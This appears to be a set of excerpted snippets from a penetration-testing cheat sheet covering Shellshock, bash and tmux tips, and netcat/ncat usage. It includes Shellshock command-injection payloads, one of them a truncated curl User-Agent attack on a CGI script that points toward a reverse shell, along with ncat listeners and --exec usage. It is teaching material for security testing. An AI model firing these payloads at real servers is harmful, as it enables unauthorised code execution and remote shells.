- Older bash versions may execute code after function definitions. Via command line (source with explanation): `export newfunction='() { echo "shellshockdemo";}; echo vulnerable'` Via a web server / CGI script. Caution: also try the reverse shell example in Burp if the curl command fails! `curl http://$target/cgi-bin/admin.cgi -s > before` `curl -H "User-Agent: () { :; }; /bin/bash…`
- Shellshock: A function stored in an environment variable is executed in a child process of bash. When exporting a new function like this, `export func='() { echo mist; }; echo aha;'`, and starting a new bash session, "aha" is executed.
- Create a session: `tmux new -s <name>`
- Use dash, which doesn't drop privileges. Arguments: ls. Sort by most recently modified file: `ls -t` Better history: add this to .bashrc `HISTSIZE=10000` `HISTTIMEFORMAT='%F %T '` Handling files whose names start with -: `cp -- -file.txt file.txt` STDOUT, STDIN and STDERR (redirection). Send STDERR (2) to STDOUT (1) as well: `cmd 2>&1` man: searching for a keyword in…
- Name confusion. Serve a file: `echo -e "HTTP/1.1 200 OK\nContent-Length: 5\n\nHallo" | nc -l localhost 8000` Request a file over SSL: `echo -e "GET / HTTP/1.1\nHost: localhost\n\n" | ncat -C --ssl localhost 443` Return the output of a program: `ncat -l localhost 3000 --exec /bin/date` Transfer a file directly (unencrypted!): 1. Receiver: `user@host02:~$ ncat -l > aha` or `nc -nlvp 4444`…